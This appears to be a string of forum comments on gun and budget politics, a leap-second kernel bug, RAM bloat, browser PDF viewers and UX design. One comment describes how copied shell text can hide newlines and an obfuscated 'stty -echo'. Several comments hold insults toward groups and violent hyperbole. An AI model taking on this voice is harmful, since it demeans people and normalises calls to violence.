2) Refused to even allow debate about gun-law reform as children are murdered in movie theatres and preschools. (2012)
That's because some of us are intelligent enough to have observed that criminals do not obey laws. We have also observed that governments which disarm their people become tyrannical. Want my guns? Come get 'em.
Zowie. Apparently Australia has turned tyrannical when I wasn't watching.
3) Held hostage the national debt forcing the most austere sequester in federal government history, leading to spending cuts and furloughs (2013)
Good. Any spending cut is a good spending cut. As it turns out, us fiscally conservative people you hate use our money more wisely than the government does.
Aha. How do you get to work? How will you get to work when roads can't be funded out of general revenue anymore (using Australian terminology). Note here that I'm assuming that since you are a good republican voter, you drive a massive fuck-off SUV built in detroit via subsidised car companies, and shun that horrible socialist public transport system. Note that road registration systems never provide for funding of the road despite uninformed opinions to the contrary - that expense is simply far too large for any feasible user pays system - the user would revolt.
If you were to get a proper representation of the Tea-Party demographic (the three-C's: climate-change deniers, creationists, capitalists), you would find that there are more GEDs and high-school drop-outs than college elite. You would also find that multiple studies have proven that the college elite (read: EDUCATED) tend to be liberal.
You might not be patting yourself on the back if you'd stood in line to vote in my precinct. Obama's biggest constituencies seem to be welfare trash, non-English-speaking immigrants, drug addicts, and various other dregs of the big city.
Oh wow, special. And it's ironic perhaps to think this article is discussing science education. Where's your data?
How is that cheating? I thought that is a simple demand and supply rule.
No. The cheating part is the accepting the offer and then refusing to do the work; without advance notice. I am all well and good with interviewing with the employer, and then refusing the offer by telling the prospective employer that it's not enough -- and you'd love to work for them if they'd increase teh amount.
It's called blackmail. "I'm going to suddenly stop doing this thing that I promised to do"
Qantas went on strike in Australia a couple of years ago. As in, the company temporarily ceased to trade and banned their workers from entering the premises, because they weren't happy with how the employment negotiations were proceeding. Of course, all the conservative hacks and politicians applauded Qantas manglement for doing such a thing with absolutely no notice (to the point where passengers were stranded locally and overseas).
The same people try to make it illegal in the other direction of course.
As an ex-telescope operator (who left incidentally because I was pissed off with manglement) with friends at ALMA, I say ALMA and their member signatories may be getting what they deserve.
How often does the leap second bug recur?
That one? Once. Seen plenty of different style leap second bugs (too many - leap seconds should be a relatively easy calculation, but we only get to test them once every 3 years or so, and in real time because it's kinda hard to convince a global time keeping system that a fake leap second is about to happen for testing. Still, I'd rather we fixed the software than do stupid things like get rid of UTC like some idiots are proposing), but one that causes a futex loop in java processes (and the opera web browser) just the once, and mostly only on RHEL6 and debian ~wheezy kernels at the time.
If It is known to occur, then why would such platforms be relied upon instead of patching it ahead of time?
The point of bugs is that they're not known to occur beforehand. This particular one was quite neat in that it wasn't the leap second code itself that was at fault, but it was the mechanism ntp used within the kernel to inform the kernel that a leapsecond was coming up. At least it didn't happen over the public holiday New Year period this time. I knew Monday was going to be a busy day in the datacentre when I saw my 3 laptops at home exhibit the problem on Sunday morning though.
It seems to me that developing new DCIM solutions is a bit of a stretch to solve the leap second issue. Or is that just an excuse to fund new DCIM solutions (in other words, a solution in search of a problem)?
Anything can cause a kernel or userland software to suddenly enter a hard loop burning through CPU cycles and thus power. And in a large homogenous environment, that bug can be triggered in many locations all at the one exact moment in time. Another good example might be the RHEL6 bug that affected us around the same time last year - the old "uptime has reached a hundred and something days, let's overflow a counter and kernel PANIC now!" bug. We found out about that bug after patching all of our systems, found out that it only applied to the version of the patch we managed to apply, and had to start planning to bring the next patching cycle forward (but at least we knew about it) . You'd think these were the kinds of bugs that we learnt about in 1995 and were never stupid enough to put such bugs back into the kernel, but it seems every generation must learn about it for themselves instead of reading their Operating System text books.
The point of these bugs is that anything might cause a large fraction of your machines to start chewing through electricity. In an overprovisioned environment (VMs, power, thin storage, whatever), you want to know about them before you trip your fuses/run out of memory, fill up all your disks.
When RAM is plentiful and cheap and even your average smartphone has more than 1GB of RAM are you sacrificing anything by only using a few MB of RAM instead of GBs?
Your *average* smartphone? I don't choose to throw out a perfectly workable smartphone Every Damn Year, so my year old phone only has 384MB of RAM. It still works, but some modern apps that add glitz at the expense of functionality are becoming seriously painful on it.
You sir, are what is wrong with the planet today. Too many teenage developer weenies that are so abstracted away from the machine that they've forgotten how to program efficiently. "Oh, but I need all that RAM to make my program cache things so it can be quicker". So why is it so much slower to fire up a pdf viewer on my phone with 384MB of RAM than what it was to fire up on my 12 year old laptop with 128MB of RAM?
All of my machines are maxed out. All of our rackfulls of ESXi servers at work are maxed out. Adding more RAM is not *easy*. Making devs do their jobs would be easier.
From your link it seems the actual danger is in copy/pasting and then hitting enter BEFORE looking at what it is you typed. If you select something to copy, then paste and notice the pasted output is significantly difference to what you selected, alarm bells should ring very quickly (unless the difference is really subtle of course).
Hint: copied text can contain embedded newlines. And the first line of text will be some obfuscated form of stty -echo, if you have read the posted source, so you won't even know.
Then again, this seems mostly hypothetical. Does anyone actually have an example of something like this being used in a nefarious way on a Linux site?
Well, it's impossible to prove something doesn't exist, and since this whole slashdot story originated because someone's computer did something unexpected, perhaps the OP is an example of where this was used?
WhyTF would anyone want an inbuilt PDF viewer?
A browser is supposed to display whatever I click on - any file, any format. If it can play sound, play video, display photographs, display text... then why not a PDF? Seems strange to have one document format that it *cannot* display, and requires an external application to render.
Or did you want the browser to call an external program for things like
.gif, .mov, .aiff - anything that is not plain old .html ??
Yes please, because those dedicated programs I have installed do a far better job with less memory and resource usage than a bloatware browser that tries to compromise on everything. You know, "do one job and do it well" kind of Unix philosophy.
(I do let my browser run animated gifs and SVG because they do it well enough. But I download
You just sound like a computer "hipster" to me. Come crack open a PBR with me and relax
.. you don't have to try this hard to be different. As someone who has done production in many industries, please let me reassure you that we wouldn't have adopted today's tools if they weren't better than yesterdays.
5, insightful? Everything is better today? Like web2.0ified everything? Hardware management like Cisco's UCS client is now web2.0. As is VMWare's preferred interface to vsphere5. And half the monitoring crap I use. This is all in a fairly modern server farm.
And yet, the web2.0 part of all of it works exactly like, and is just as useful as a piece of dinosaur turd rotting in a vat of lava.
So, almost by definition, you're trying to run Cisco's interface over a narrow bandwidth relatively high latency IPVPN link to a remote datacentre, through a VNC session. And yet when it wants to pop up a web2.0 modal confirmation (yes/no) dialog box, it makes the background *fuzzy*. That works *extremely* well. Nothing like having to wait for 30 seconds everytime I want to click "confirm" while it progressively makes the background more and more blurry. But that's hip, I guess.
And when I try to move a bunch of servers into a different category in the Zenoss monitoring software, there's a small chance, that happens enough often to keep me on my toes nevertheless, that the GUI display of what I have shift-selected will be out of sync with what the backend thinks was the 4th to 8th item in the list (because some AJAX crap didn't quite load entirely, but the browser didn't flag any error), and I'll be moving a bunch of unidentified machines into the "decommissioned" category. That's awesome when that happens. Because it's web2.0, there's no change management, undo or auditing. If I notice that a bunch of machines seem to be in the wrong category, and can't work out where they came from, I have no choice but to go back to backups and try to restore several databases. That's just awesome. Give me back nagios and *automatically* managed
I mean, the trend is to remove choice and features and pretend that configuration makes it too hard for the poor lusers (ala, gnome3).
One bug with chromium that has been marked as WontFix for this very reason, is issue 11612. "You can install an extension (that doesn't work in most situations you need it to, such as in the default about:blank)!". As bad as firefox has been getting since version 2, at least *that* particular feature still can be turned on.
But I do have to ask, WhyTF would anyone want an inbuilt PDF viewer? That's the first thing I disable in browsers that do that by default (except in very old editions of SuSE, where it was installed into the system and not able to be disabled because SuSE, at least then, liked to load everything unconditionally and not overridable by the user). Yes, you can have a poor replacement for a PDF viewer that isn't a first class PDF viewer and can't print and is slow, and half the key bindings just plain don't work, or you can have it in a dedicated PDF viewer that does One Thing Well, just like Unix intended.
All redesign work should go through the UI/UX folks responding to the users' needs.
I strongly believe that form follows function, but without real consideration to how users will be using the software the user interface can seriously impede the actual function. Some engineers can be downright sadistic in their UI designs.
UX folk are why we end up with Microsoft Windows 8, the Ribbon interface, lack of menu bars, Gnome 3 and Chromium ("no, you can't have middle-click-selection-opens-URL-contained-in-copy-buffer, because that's too confusing for the lusers!"). They should all be dumped into a vat of boiling Hydrofluoric acid.
OK, so he doesn't like good sound quality, so he got rid of the decent speakers and replaced it with Apple rubbish (that sound good to bad ears because they've just turned up the loudness and done wacky artificial things to phasing of the stereo signal). And same with cameras (personally, I think people who publish photos taken with an iphone should be shot for polluting the flow of electrons with their crappy photos). Where did his microwave go? Does he entirely eat out now? Concrete floor? Sounds lovely.
Heck, I still go on multiday tours on motorbike (with not much spare room besides my tent and sleeping bag) with SLR and second lense *because it produces better photos*. It's a pity a lot of people don't care about quality anymore, but some of us still do.
(To those who will bleat "Vote!": I do vote but the only choices likely to be elected are those thoroughly venal politicians who will continue the irresponsible spending. It is built into the election process that those who are committed to significantly and actually cutting the government spending will never get the big donations necessary to win. The big donors give the big bucks to politicians who will turn the federal faucet in their direction -- not turn it off. )
Use those guns that you guys are so proud of to usher in the revolution, and thereby pass a referendum to change your broken voting system to anything but first-pass-the-post. Preferably (so to speak) something preferential. Then you too can have a half decent system where you can vote for one of the other corrupt parties without "wasting" your vote.
Here's how a typical SMS platform might work: someone purchasing a box of malaria medicine could send the barcode information to a text number, which would send back an SMS message identifying the drug as real or counterfeit.
Ah, it looks like they're hoping to implement RFC3514, the evil bit. If the barcode includes the evil bit, then it must be counterfeit.